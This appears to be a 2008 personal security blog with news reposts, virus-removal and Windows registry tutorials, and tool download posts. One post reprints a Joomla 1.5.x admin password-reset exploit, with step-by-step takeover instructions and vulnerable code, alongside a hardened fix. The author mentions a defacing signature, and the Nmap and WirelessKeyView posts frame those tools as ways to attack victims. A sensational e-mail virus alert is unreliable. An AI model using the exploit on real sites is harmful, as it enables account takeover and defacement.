Thursday, December 18, 2008

Check files for viruses online, for free

This time I'm posting in Malay for a change.. If any of us comes across an .exe file and is scared to run it, and the antivirus happens to have never been updated, this is how to find out whether the file is dangerous or not..

Whether you already know it or not, there is a website on the internet, http://www.virustotal.com, that runs a service to analyse suspicious files and also provides a complete and fast report!! It sounds great and it really is great.. This website can detect viruses, worms, trojans and every kind of malware that antivirus products can detect. (because sometimes another antivirus brand already detects something while yours doesn't detect it yet).. so, if you use this website, you can find out whether the file has ever been detected by any antivirus that exists in the world.. if there is none, it means the file is safe...

According to its website, VirusTotal is:

* Free (that's the part that sounds nice)
* Uses multiple antivirus engines
* The very latest virus signatures.
* Detailed results for each antivirus.
* Up-to-date statistics.


enough rambling, let's learn how to use it.. though it feels like there's no need to teach it because it's so easy to use.. but I'll write it anyway to make this post a bit longer.. besides, it's no fun always copy-pasting, better to write a bit myself too.. hehe..

1. It's really easy to use.. first just open the website http://www.virustotal.com and if you're too lazy to type, just click that link..

2. Then a page like this will come up..




3. Then what else.. let's all click the browse button and pick the file we were doubtful about.. then click the send file button.. that's all.. then wait for the result.. easy, isn't it? But did you notice that under the text field there is a checkbox that says "send over SSL"? That function is for users who have trouble uploading the normal way.. it happened to me once, when I wanted to upload a file on campus.. since it was a virus file after all, the firewall blocked the upload, so I used send over SSL.. and the upload succeeded..

4. The result looks like this..


and this..


so how was it.. fun, right.. see you again.. happy trying..

assalamualaikum..

Google sponsored links caught punting malware

Researchers from Websense have caught Google carrying ads punting rogue software that secretly installs malware on the PCs of its users.

Recent Google searches for Winrar turned up sponsored links that offer a "spyware free" copy of the widely used data-compression application. Google users unfortunate enough to download and install that software are soon exposed to a program that makes changes to their PC's hosts file. From then on, every time the users try to visit Google, Yahoo, and other popular sites, they are instead sent to an impostor site under the control of the attackers.

The operation is another testament to the resourcefulness of those running rogue software scams. Rather than relying on zero-day vulnerabilities or hard-to-execute website hijackings, they often find it easier to snare their victims through legitimate ads placed on Google or elsewhere.

"This raises some questions," Websense researcher Elad Sharf writes. "Is this problem Google's fault for not checking whether advertised links actually serve malware? Is it the miseducated user's fault for getting infected?"

Probably a little of both, but are we the only ones who find it ironic that Google's own anti-malware initiative imposes draconian punishments on smaller websites when they're caught doing the same thing? Websense, which first witnessed the scam last week, said the malicious Google links were still available when it posted this report on Sunday.

A Google spokesman said the company is in the process of removing the offending sites from its ad network. "Google is committed to ensuring the safety and security of our users and our advertisers," he said.

As a recent complaint filed by Federal Trade Commission shows, purveyors of rogue anti-virus and other software spend millions of dollars per year advertising their wares on legitimate sites - and go to great lengths to conceal their behavior. No doubt, Google isn't the only advertiser to be tricked into running malevolent ads, but as the do-no-evil company that's steam-rolling its competition in the ad industry, it's hard to believe these kind of links are still being sponsored.

Resource: http://www.theregister.co.uk/2008/12/16/google_sponsored_links/

Wednesday, December 17, 2008

Microsoft issues emergency patch warning for IE

Microsoft will push out an emergency security patch for Internet Explorer on Wednesday, addressing a critical security hole currently being exploited in the wild.

Redmond issued advanced notice for tomorrow's fix, describing the out-of-cycle patch as protection from "remote code execution."

Unscheduled updates are pretty rare for Microsoft, stressing the potentially serious nature of the flaw. Although the last time Microsoft broke its update cycle was in late October – it was the first time it had done so in about 18 months.

The latest zero-day vulnerability stems from data binding bugs that allow hackers access to a computer's memory space, allowing attackers to remotely execute malicious code as IE crashes, Microsoft has said.

Although the exploit was at first contained to warez and porn sites hosted on a variety of Chinese domains, the malicious JavaScript code has since spread to more trusted sites through SQL injection. The flaw is primarily being used to steal video game passwords at present, but could potentially be used to retrieve more critical sensitive data from users as well.

The vulnerability is specifically targeted at surfers running IE 7, but it's also known to affect versions 5, 6, and 8 of the browser as well. All IE users are advised to install the update.

Microsoft's emergency patch will become available Wednesday at 1 PM EST from auto-update and the Microsoft Download Center. A separate patch will be made available for those running IE8 Beta 2.

Resource: http://www.theregister.co.uk

Tuesday, December 16, 2008

McColo Shutdown Led to Malware Threat Reduction in November

Internet security firm Fortinet said that online threats and spam levels dropped significantly in the month of November 2008. The downward trend has continued since September 2008, when both online threats and spam were at their peak.

According to the "November Threatscape Report" released by Fortinet, the slowdown in unsolicited e-mails and spam is not likely to continue for long and may reverse in the month of December 2008. The downward trend was initiated with the closure of ISP McColo, the biggest trend determiner. But once the malicious attackers find new replacements to host their spambots and sites, the number will increase again.

Moreover, security experts said that another reason for the fall in the number of spam and online threats during November 2008 was that attackers might have been busy building and planning new attacks to launch during the holiday season, when a large number of people come online to shop. This planning will help in making a large number of unsuspecting users their victims.

Derek Manky, Project Manager, Fortinet, stated that spam and malware activities are expected to rise at a fast pace as the spam botnets find new hosts after the closure of McColo, as reported by Security Watch on December 4, 2008. He further added that with the start of the new online shopping season, key-logging activities are likely to escalate. The upward trend has already been noticed since the close of November 2008.

The report also disclosed that out of 81 vulnerabilities detected in the month of November 2008, 25 were classified into high risk category. Among those 25 vulnerabilities, the top were Worm.Slammer and Trojan.Storm.Worm.Krackin.Detection, which together represented 60% of the total vulnerabilities.

Moreover, giving more details on keyloggers, Fortinet revealed that out of top five malware variants encountered in November 2008, three belonged to the family of Goldun. This family is mainly designed to track users' keystrokes which are used to steal their personal and financial details such as credit card and banking details.

The security firm further said that rising key-logging activity points to preparations for online shopping during the holiday season.

Resource: http://www.spamfighter.com



Phishing Attacks Increased Alarmingly by 240%

The security firm Websense unveiled that out of every 50 e-mails, three are phishing e-mails sent by scammers, representing a month-on-month rise of 240%, or accounting for about 83% of all sent mails.

Websense observed that 90.5% of spam e-mails contained a URL, a percentage that has never been seen before. Security experts justified this fact by stating that in recent times, scammers have started to deploy more sophisticated techniques to exploit the current financial crisis.

The security experts further stated that once again it is the work of a key gang of phishers that has led to this significant increase in the level of phishing attacks. The majority of the criminals use phishing kits, including a typical subdirectory dubbed "rock", designed to attract unaware users towards the bogus websites. But once the phishing filters started seeking the word, the gang put an end to this technique.

The analysis also revealed that scammers are constantly pushing in various sophisticated packages of malicious code, including "blended threats" that make use of phony images and links. These malicious contents can get installed secretly onto the victim's PC.

Further, the criminals have launched a phishing technique where an incomplete form is also able to reveal the sensitive data of the user, even if a user sends back the form to the fake website by filling in bogus details.

Earlier in August 2008, SecureWorks researcher Joe Stewart revealed the way in which an incomplete form, sent back to a site hosting the Asprox botnet, resulted in further exploits of the user's browser.

Such attacks could be detected and restricted only with the help of professional expertise. They also warned the firms which are comprehensively dependent upon the internal security measures.

Moreover, the attacks are very devastating and highly sophisticated. So, lacking a strongly responsive security solution, customers may witness storage capacity and bandwidth problems, a slowdown in productivity, and exploitation of sensitive information.

Furthermore, a research by SANS Internet Security Centre shows that a well-designed phishing e-mail can attain a click-through rate of around 10% while that of a targeted one can exceed 80%.

Resource: http://www.spamfighter.com/

Monday, December 15, 2008

A Shared Reflection

The Messenger of Allah (SAW) said: ".. Allah SWT has said: I am Allah. There is no God but Me. I am the Lord and the King of all Kings. I hold the hearts of kings in My hand. When the people obey Me, I will turn the hearts of the kings to mercy and affection towards them. When the people disobey Me, I will direct the hearts of the kings towards anger and vengeance against them. Thus the kings will place them in hardship and suffering. So rather than cursing them (the unjust leaders), it is better to return to remembering Me and to plead to Me that I protect you from their cruelty."


Chinese researchers inadvertently release IE7 exploit code

Chinese security researchers have admitted that they inadvertently released code that might be misused to exploit an unpatched Internet Explorer 7 vulnerability.

Scripts to pull off the trick were already on sale in underground forums before the inadvertent release. Even so, anything that increases the likelihood of digital delinquents getting their hands on the exploit is unwelcome.

VeriSign's iDefense security division reports that attack code was up for sale at prices of up to $15,000 through underground forums. Prices are likely to slide following the escape of assault code from labs run by KnownSec.

Security tools firm eEye reckons the flaw has been the target of exploitation since 15 November.

According to iDefense, KnownSec made the code available after failing to realise that last Tuesday's Microsoft bulletins failed to fix the underlying vulnerability behind the bug, which revolves around IE7's handling of malformed XML tags. An explanation of what happened by KnownSec (in Mandarin) can be found here.

The flaw affects XP and Vista users, and creates a means to load Trojans or other forms of malware onto even fully patched Windows boxes simply by tricking surfers into visiting maliciously constructed websites. Thus far the attack method has been restricted to delivering game password stealers, the Internet Storm Centre reports.

Microsoft is investigating reports of attacks and considering its options. The timing of the attack in the run up to the holiday period and just after a bumper batch of eight bulletins suggests an out of sequence patch might be on order before the next scheduled Patch Tuesday, on 13 January.

Firefox plug-in Trojan harvests logins

Virus writers have latched onto the popularity of Firefox with a new variant on the established practice of stealing online banking passwords.

A password pinching Trojan that poses as a Firefox Plugin is doing the rounds, Romanian security firm BitDefender warns. ChromeInject-A is typically downloaded onto Windows PCs already compromised by other strains of malware.

Once installed, the Trojan sits in Firefox’s Plugin folder, activating every time the popular browser is started. The backdoor code looks for data exchanged between a compromised machine and a list of pre-programmed banking sites in Europe, Australia and the US.

Harvested login credentials are captured and subsequently posted to a server located in Russia.

More details on the bank sites targeted, along with the general behaviour of the Trojan, can be found in a write-up by BitDefender here.

BitDefender reports that incidents of the malware are “very low”, so the attack is more notable for its novelty than its potency. Malware that capitalises on the popularity of Firefox is rare, but not unprecedented.

Two years ago a spyware package that masqueraded as an extension to the Firefox web browser was spotted on the net. Like ChromeInject-A, FormSpy failed to do much harm.

Source: http://www.theregister.co.uk/2008/12/04/firefox_plug_in_trojan/

Sunday, September 7, 2008

Joomla 1.5.x Remote Admin Password Change


#####################################################################################
#### Joomla 1.5.x Remote Admin Password Change ####
#####################################################################################
# #
# Author: d3m0n (d3m0n@o2.pl) #
# Greets: GregStar, gorion, d3d!k #
# #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff #
# #
#####################################################################################



File : /components/com_user/controller.php

#####################################################################################
Line : 379-399

function confirmreset()
{
    // Check for request forgeries
    JRequest::checkToken() or die( 'Invalid Token' );

    // Get the input
    $token = JRequest::getVar('token', null, 'post', 'alnum'); // <--- {1}

    // Get the model
    $model = &$this->getModel('Reset');

    // Verify the token
    if ($model->confirmReset($token) === false) // <--- {2}
    {
        $message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
        $this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
        return false;
    }

    $this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
}

#####################################################################################

File : /components/com_user/models/reset.php

Line: 111-130



function confirmReset($token)
{
    global $mainframe;

    $db = &JFactory::getDBO();
    $db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); // <--- {3}

    // Verify the token
    if (!($id = $db->loadResult()))
    {
        $this->setError(JText::_('INVALID_TOKEN'));
        return false;
    }

    // Push the token and user id into the session
    $mainframe->setUserState($this->_namespace.'token', $token);
    $mainframe->setUserState($this->_namespace.'id', $id);

    return true;
}
#####################################################################################



{1} - Replace ' with empty char
{3} - If you enter ' in the token field then the query will look like: "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "


Example :


1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password

# milw0rm.com [2008-08-12]

full info: http://www.milw0rm.com/exploits/6234
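
Why a lone ' is accepted, shown as an added example (not code from the advisory or from Joomla): a Python/sqlite3 model of the logic at {1} and {3} next to a hardened check. The table layout, the sample rows and the 32-character hex token format are assumptions made for the illustration.

```python
import re
import sqlite3

# Constructed sample data. "admin" has never requested a reset, so its
# activation column is empty; "alice" has a pending reset token.
SAMPLE_USERS = [
    (62, "admin", 0, ""),
    (63, "alice", 0, "0123456789abcdef0123456789abcdef"),
    (64, "bob", 1, ""),  # blocked account
]


def make_db():
    """Build an in-memory stand-in for the #__users table."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT,"
        " block INTEGER, activation TEXT)"
    )
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return db


def alnum_filter(value):
    """Model of the 'alnum' filter at {1}: keep letters and digits only."""
    return re.sub(r"[^A-Za-z0-9]", "", value)


def confirm_reset_vulnerable(db, raw_token):
    """Same logic as confirmReset(): look the filtered token up as it is.

    The value is bound safely (like $db->Quote), so this is not SQL
    injection. The flaw is that an empty token is compared against the
    empty activation column of accounts with no reset pending.
    """
    token = alnum_filter(raw_token)  # "'" becomes ""
    row = db.execute(
        "SELECT id FROM users WHERE block = 0 AND activation = ? ORDER BY id",
        (token,),
    ).fetchone()
    return row[0] if row else None


# Assumption for this example: reset tokens are 32 lowercase hex characters.
TOKEN_FORMAT = re.compile(r"[0-9a-f]{32}")


def confirm_reset_hardened(db, raw_token):
    """Reject anything that is not a well-formed token before querying,
    and never match accounts whose activation column is empty."""
    token = alnum_filter(raw_token)
    if not TOKEN_FORMAT.fullmatch(token):
        return None
    row = db.execute(
        "SELECT id FROM users WHERE block = 0 AND activation <> ''"
        " AND activation = ? ORDER BY id",
        (token,),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run both checks on a lone quote and on alice's real token."""
    db = make_db()
    valid = "0123456789abcdef0123456789abcdef"
    return {
        "vulnerable, token \"'\"": confirm_reset_vulnerable(db, "'"),
        "hardened, token \"'\"": confirm_reset_hardened(db, "'"),
        "vulnerable, valid token": confirm_reset_vulnerable(db, valid),
        "hardened, valid token": confirm_reset_hardened(db, valid),
    }


if __name__ == "__main__":
    for label, user_id in demo().items():
        print(f"{label}: user id {user_id}")
```
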

Friday, May 30, 2008

How to remove Flash.10.exe and Macromedia.10.exe virus

This is quite a lame virus, but many computers are still infected with it, so I will write a tutorial to help people remove this pest.

Characteristics

As usual, this virus will disable your Registry Editor, Search and Folder Options to keep itself hidden. But this virus will not disable your Task Manager. Why? Because this is a trap. When you open Task Manager and find flash10.exe in the process list, don't end the process yet, because doing so will shut down your computer. So what we need to do is just follow these steps.




Step 1 - Enable registry editor and folder option

Download Washer here. Re-enable your Registry Editor and Folder Options by using Washer.


- If the virus has attacked your computer, the Disable Regedit, Hide Find and Hide Folder Option check boxes will be checked.
- Leave the check boxes as they are and click the Repair Registry button straight away; in just a few seconds you can access your registry, search and folder options again.
- If this doesn't work, try it again or ask someone to help you.



Step 2 - Remove the virus link in registry

First open the registry editor: Start > Run, type regedit and press Enter. Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentUser\Run and delete the WindowsMSN key on the right-hand side.

Then go to HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\ and delete the C:\WINDOWS\system32\Flash.10.exe key on the right-hand side.

Then go to HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows\ and delete the load key on the right.

Then go to HKEY_USERS\S-1-5-21-2000478354-2025429265-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache and delete the C:\WINDOWS\system32\Flash.10.exe key.

Last, go to HKEY_USERS\S-1-5-21-2000478354-2025429265-839522115-1003\Software\Microsoft\WindowsNT\CurrentVersion\Windows\ and delete the load key.

If you are tired of hunting for the keys, just press F3, type flash.10, and press F3 again to keep searching.

After that, restart your computer.


Step 3 - delete the virus file

After restarting your computer, make sure the virus is no longer running. Open Task Manager; if Flash.10 and Macromedia.10 are not in the process list, it is safe to delete the virus files. If not, repeat step 2.

Before deleting the virus, you need to configure your Folder Options first. Open My Computer, click the Tools menu and choose Folder Options. If Folder Options does not appear, repeat step 1.

Now change the settings to match my Folder Options in the picture below. The changes are to Show hidden files, Hide protected operating system files and Hide extensions for known file types. Click OK.



Go to C:\Program Files\Common Files\Microsoft Shared\ and delete Macromedia.10.exe

Now, open C:\Program Files\Common Files\Microsoft Shared\DAO\ and delete the file MSN.msn. The virus tries to spoof by using the MSN logo and name.

Then, go to C:\WINDOWS\System32\ . Right-click, choose Arrange Icons By > Modified. Then scroll to the last row and look for Flash.10.exe, cmd.com, dxdiag.com, JambanMu.com, msconfig.com, ping.com and regedit.com. Delete these files. Remember, delete only the listed files!!

Then, delete the virus on your USB drive by referring here. Delete only Flash Jokes.exe, Autorun.inf, Flash.10.Setup.exe and Scanner.exe

Now restart your computer. Hopefully your computer will be okay.



Friday, May 2, 2008

Saje-saje memoyo


This is one of my defacing signatures.

announcement!!

I received many comments on a file that I'd uploaded named Washer, that had been infected by a virus named virutQ. I have no idea how the virus infected my file, but I studied the problem and got the solution. Now I have uploaded a new Washer that is free from viruses. Thanks for your comments and thanks for supporting my blog; hopefully you still support me. This is the new link. If there are any problems, please let me know. I just want to help people solve their problems. Thank you. http://www.humyo.com/F/722217-137064809

Sunday, April 27, 2008

Saturday, April 26, 2008

Change Explorer Background Image

This is a simple registry manipulation for changing the Explorer background image.

1. Create your own image in Photoshop at your own size. I prefer 785x86 pixels. Save it as a .bmp, for example back.bmp.






This is my example.

2. Then open registry editor: Start > Run > Regedit.exe
3. Open HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar.
4. Add a new string by right-clicking and name it BackBitmapShell.
5. Double-click the key and enter the full path of your bitmap image. Click OK.
6. Close the registry editor and open My Computer. Voilà!

Wednesday, April 23, 2008

Bad day

Today, I was surfing websites. Suddenly a message appeared telling me that updates for my free AVG antispyware were completed. I thought it was the same as every time I update, but today was different. After the message, I heard a sound and I realized that my profile was fully deleted. There was no more Quick Launch toolbar, no shortcuts on my desktop, and no profile for my Mozilla Firefox. A very bad day, because I really forgot to save my profile and my restore was turned off. That is a big lesson for me to always update my profile.

Sunday, April 20, 2008

My Latest Wallpaper

How to insert things in context menu

Open your Registry Editor via Start > Run and type regedit.. then go to HKEY_CLASSES_ROOT\*\Shell\ .

Create a new key by right-clicking it, and rename it to whatever you want, for example notepad. On the right-hand side, double-click the default value and enter the text you want to appear, for example "open with notepad".

Then create a new key under the previous key and name it command. Change the default value to the path of your file, e.g. C:\WINDOWS\System32\Notepad.exe, and don't forget to add %1 at the end to ensure this appears only on supported files. So it becomes C:\WINDOWS\System32\Notepad.exe %1.



Easy way to rename recycle bin

Many people have problems renaming their Recycle Bin to whatever name they want. So I provide a simple tutorial on how to do it..

Open up your text editor or notepad and copy the following text into a new file:

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder]
"Attributes"=hex:50,01,00,20
"CallForAttributes"=dword:00000000

Now save this file under whatever name you want, but it must end with .reg, e.g. rename bin.reg.. Double-click the saved file and press Yes if a message box prompts you. Then you can rename the Recycle Bin by right-click > Rename, or by pressing F2 directly while the Recycle Bin is highlighted..

Change Background of the folder

As Windows XP Home/Pro was released, many have realized that Microsoft had removed our ability to change the wallpaper of our folders! Shortly after we realized the trouble on our machines, we got to work on a solution. We’ve found that Microsoft™ did not remove the ability to change the background and text color but instead hid the interface.

Now, it is somewhat simple for anyone to add wallpaper to a Windows XP folder.


1) Open notepad

2) Type in the text below
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image="C:\your picture location.jpg"
IconArea_Text=0x00FFFFFF

3) Save file as desktop.ini
Save as type : All Files

4) Copy the desktop.ini file you just created, and paste it into the folder whose background you want to change

5) Go to START --> RUN..

6) Type attrib +s "C:\Location of your folder"
Click OK

7) Open your folder and the picture should be set by now.

Tuesday, April 1, 2008

mY Latest Poster

"sometimes you're always want to be.."

Thursday, March 27, 2008

Boost the speed of your Adobe Reader 8.0

To boost your adobe acrobat reader 8.0, open the Adobe Reader 8.0 directory at:

C:\Program Files\Adobe\Reader 8.0\Reader

There you will see the Optional and Plug-ins folders. Open the Plug-ins folder, then cut all the files and folders inside and paste them into the Optional folder.

Good Luck.

Wednesday, February 13, 2008

Peacefull Sunset


Time to feel that you're not always win

Saturday, February 2, 2008

Virus Washer Guide

I always talk about a tool named Washer in my previous posts, but I never explained how to use it. Today I'll briefly tell you how to use it. Let's start with the first function.

Ultimate Washer is able to detect worms / viruses on your computer, with a configuration to detect polymorphic worms

Ultimate Washer will search for TRUE duplicate files using a byte comparison method, ensuring a high level of accuracy that you can configure manually in the range between 95% - 100%.


STOP wasting your hard drive space on duplicate files in multiple paths. Ultimate Washer lets you find duplicates on hard drives, floppy disks, flash disks, CDROM, DVD, network drives, etc.

Ultimate Washer can be used widely in many conditions and you can also use this software to remove almost all worms on your computer easily. And you can tweak your computer's settings in a single click. Credited: www.softpedia.com

Scan

This is the function for scanning with a sample file and detecting whether there are any files with the same signature as that file. First we need to load the sample file; for example, we load virusmawar.js and the software will search throughout the PC for similar files, which we can delete directly. We can also choose which drive to scan by rolling over the Drives label.

Startup

This function lists all software that runs automatically every time you boot your computer. Viruses usually make this one of their objectives (making the virus run at every boot). This tool does not provide deletion of these keys; you need to open your registry manually and delete the keys if they are suspicious.






Registry

This part will tick the registry settings that have been changed by a virus; for example, if your Task Manager has been disabled by the virus, Disable Task Manager will be ticked. Just click the Repair Registry button and your registry will be back to normal.

Processes


This part has the same functionality as the Task Manager provided by Windows. If your Task Manager has been disabled by a virus, it is the alternative.

That's all the functionality. Thanks to mr cool_entarto for creating such a nice tool.

Now i removed the infected washer and replaced it with new one.. thanks for comments.. washer download

Friday, February 1, 2008

i Phone

The iPhone is a multimedia, Internet-enabled mobile phone designed and marketed by Apple Inc. It has a multi-touch screen with virtual keyboard and buttons. The iPhone's functions include those of a camera phone and a portable media player ("iPod"), in addition to text messaging and visual voicemail. It also offers Internet services including e-mail, web browsing, and local Wi-Fi connectivity. It is a quad-band mobile phone that uses the GSM standard, and hence has international capability. It supports the Enhanced Data Rates for GSM Evolution (EDGE) data technology.

Following the success of iPod, Apple announced the iPhone in January 2007. The announcement was preceded by rumors and speculations that circulated for several months. The iPhone was introduced, first in the United States on June 29, 2007 with much media frenzy and then in the United Kingdom, Germany and France in November 2007. It was named Time magazine's Invention of the Year in 2007. A new version of Apple's iPhone is expected to be introduced in 2008 that is capable of operating on faster 3G cellular networks.
-Info from www.wikipedia.org

Wednesday, January 30, 2008

Peaceful helpful

What a harmonious animal world. They help each other without knowing each other. But among us humans, even when we know each other, there are still those who take advantage of others.

[e-book] Professional Lamp - Linux, Apache, Mysql, & Php5 Web Development

This book will teach you from the basic about PHP and Apache also MySQL. I really enjoy these books.(download)

How to remove virus from USB drive

The most popular medium for spreading viruses is the USB drive; it spreads viruses fast and very effectively. But if you know how to remove a virus from your USB drive, you can save not only your computer but the whole organization. The most important thing is the moment you open your USB drive.

Opening USB

Usually we just double-click the USB drive, but from now on you need to open it using the address bar. The address bar is at the top of your window, about 1.5 cm from the title bar. If there is no address bar, you can enable it by clicking View > Toolbars > Address Bar. By opening your USB drive this way, you can prevent the virus from autorunning.

After you open your USB drive, you need to enable hidden and super-hidden files. To do this, click Tools > Folder Options.
Click the View tab, scroll down, tick the Show Hidden Files and Folders radio button, and uncheck Hide protected operating system files and Hide extensions for known file types. Then click Apply. After this step you will see all the hidden and super-hidden files on your computer, but remember: don't blindly remove files on other drives, because some of them are important system files.

After that, if your drive is infected, you will see a file named autorun.inf. Double-click the file to find out which file is the virus. On my USB drive the file contains:

[autorun]
Open = wscript.exe \VirusMawar.js
shellexecute = wscript.exe \VirusMawar.js
shell\Open\command = wscript.exe \VirusMawar.js
shell\Explore\command = wscript.exe \VirusMawar.js -Clicked
shell\AutoPlay\command = wscript.exe \VirusMawar.js
shell\Scan for Viruses\command = wscript.exe \VirusMawar.js
shell\Scan with Norton AntiVirus\command = wscript.exe \VirusMawar.js
shell\Scan with AVG\command = wscript.exe \VirusMawar.js
shell = Explore

The suspected virus is VirusMawar.js. Find it on your USB drive, highlight it, and press Shift+Delete to remove the file permanently. Now you can be a hero. :) Hopefully you enjoy this tutorial.
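
Reading autorun.inf by eye works for one drive; as an added example (not part of the original post), the Python sketch below parses the same file, lists every file its commands would launch, and flags the fake "Scan ..." right-click entries. The list of host programs and the "scan" keyword heuristic are assumptions of this example.

```python
import re

# Constructed sample: the [autorun] section quoted in the post above.
SAMPLE_AUTORUN = r"""[autorun]
Open = wscript.exe \VirusMawar.js
shellexecute = wscript.exe \VirusMawar.js
shell\Open\command = wscript.exe \VirusMawar.js
shell\Explore\command = wscript.exe \VirusMawar.js -Clicked
shell\AutoPlay\command = wscript.exe \VirusMawar.js
shell\Scan for Viruses\command = wscript.exe \VirusMawar.js
shell\Scan with Norton AntiVirus\command = wscript.exe \VirusMawar.js
shell\Scan with AVG\command = wscript.exe \VirusMawar.js
shell = Explore
"""

# Assumed list of programs that only host a script or command line;
# the file to remove is their argument, not the host itself.
HOST_PROGRAMS = {"wscript.exe", "cscript.exe", "cmd.exe", "rundll32.exe"}


def parse_autorun(text):
    """Return (key, value) pairs found in the [autorun] section."""
    entries = []
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries.append((key.strip(), value.strip()))
    return entries


def launch_commands(entries):
    """Keep only the entries that make Windows run a command."""
    commands = []
    for key, value in entries:
        k = key.lower()
        is_verb = k.startswith("shell\\") and k.endswith("\\command")
        if k in ("open", "shellexecute") or is_verb:
            commands.append((key, value))
    return commands


def referenced_files(commands):
    """Files on the drive that the commands point at (hosts and switches skipped)."""
    files = set()
    for _key, value in commands:
        for token in re.findall(r'"[^"]*"|\S+', value):
            token = token.strip('"')
            if not token or token[0] in "-/":
                continue  # command-line switch such as -Clicked
            name = token.replace("/", "\\").split("\\")[-1]
            if name.lower() in HOST_PROGRAMS:
                continue
            files.add(token.lstrip("\\"))
    return sorted(files)


def decoy_verbs(commands):
    """Right-click menu entries dressed up as antivirus scans (heuristic)."""
    verbs = []
    for key, _value in commands:
        parts = key.split("\\")
        if len(parts) == 3 and "scan" in parts[1].lower():
            verbs.append(parts[1])
    return verbs


if __name__ == "__main__":
    cmds = launch_commands(parse_autorun(SAMPLE_AUTORUN))
    print("Launch entries :", len(cmds))
    print("Files to remove:", referenced_files(cmds))
    print("Fake scan menus:", decoy_verbs(cmds))
```

Every entry, including the three fake scan menus, resolves to the same script, which is why opening the drive through the address bar instead of the right-click menu matters.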

Tuesday, January 29, 2008

Turn-upside-down-around

"The pusing-pusing is pening"

How to change "start" button text

This tutorial is a very good way to show off to your friends how powerful you are. But this is just basic Windows hacking. First you need this tool:

ResHack (download)

ResHack

Resource Hacker™ is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems.
- http://www.angusj.com/resourcehacker/


Next Step

After that, run ResHack and open the Explorer.exe file located in the C:/WINDOWS/ folder. Please bear in mind to back up this file to another folder first for safety, because it is a system file. After you open the file, some folders will appear. Open the String Table folder, open number 37 and click 1033. You will see some text at the left hand side, and one of the entries is "start". Just change the start text to any text that you want. It is as simple as a, b, c. After that, save your file and restart the computer. This software automatically creates a backup file, but it is safer to make one yourself before starting these changes. Thank you.

CamStudio 2.0

CamStudio 2.0 is free, very user-friendly screen recording software. It can record all the movement on your screen and is very useful for making your presentation or demonstration more effective with visuals. Hackers usually use this software to make video tutorials. It can output to AVI or SWF depending on your settings. Teachers can use this software to help their students understand better. What I can say about this software is that it is very powerful and very user friendly.

Download
Password: example010

Monday, January 28, 2008

New Virus Alert!!!

Everybody, please be alert for a virus attached to e-mail under the name "Life is beautiful.pps". Never download or execute the file. The symptom is that when you first click on the file, there will be a message sound: "Now it is too late, your life is no longer beautiful". At that moment it really is too late. All your data, software, programs and so on will be lost. The virus will also send your private data to its creator. So please be alert and don't click this attachment. Thank you for reading this post.

Sunday, January 27, 2008

Colourful World

"Colors are beautiful but sometimes they're annoying"

How to Change the Internet Explorer Window Title

I always see people with the problem that their Internet Explorer has an annoying IE title such as "hacked by pokemon", "Virus Mawar Mengganas" or "Virus Mawar SEDANG MENGGANAS" and so on. So I think we need to know how to repair this.

First open your Registry Editor (see the previous tutorial). If you have a problem opening Registry Editor, refer to the previous tutorial. Then open HKEY_CURRENT_USER, then SOFTWARE > Microsoft > Windows > Internet Explorer > Main. Scroll down the right side and find Window Title. Delete the key by right-clicking it and choosing Delete, or simply press the Delete key while it is highlighted. After that, reopen your Internet Explorer.

Using this tutorial, you can also customize your IE title bar by changing the Window Title key.

Thanks.

Saturday, January 26, 2008

Nmap 4.53

Network Mapper, or Nmap, is an open source network security tool that can be downloaded from www.insecure.org. This hacking tool is very commonly used by hackers and network admins all over the world, and even appears in the Matrix film. If you are using Nmap on the Windows platform, you need to install WinPcap first. It is a command-line tool and is now also available with a graphical interface, but I prefer using the command line for more accurate results. The latest version is version 4.53. This tool is usually used as the first step, to find the open ports of the victim's system. After finding the open ports, we can easily choose suitable exploits for attacking the victims. The full explanation of Nmap can be found on their website.

Download (command line)
Download (GUI)

Illusion Pics

"This world is full of illusion."

Wireless Key View [Request]


WirelessKeyView recovers all wireless network keys (WEP/WPA) stored in your computer by the 'Wireless Zero Configuration' service of Windows XP. It allows you to easily save all keys to a text/html/xml file, or copy a single key to the clipboard. But with this tool you need physical access to the victim's computer; the other alternative is Wireless Hacking.

Download

How to remove virus mawar.js

Yawn.. This virus is a truly Malaysian virus.. We can read all of its source code easily.. Just open it with Notepad and we can know everything.. and the best part is we can edit it and make it ours. How about we learn how to remove this virus? This virus disables your Task Manager, Registry Editor and Folder Options. How do you enable them again? First download Washer.
This powerful tool helps us re-enable the things that the virus disabled. Made by cool_entarto@yahoo.com, this tool is also very helpful for terminating processes whenever you can't use Task Manager. It repairs the registry, for example re-enabling Registry Editor and Folder Options.

How To Use

- If the virus has attacked your computer, there will be a check mark on the Disable Regedit, Disable Folder Option and Disable check buttons.
- Leave the check marks and click the repair registry button straightaway. In just a few seconds you can access your registry, Task Manager and Folder Options again.
- If this doesn't work, try it again or ask someone to help you.


What next?

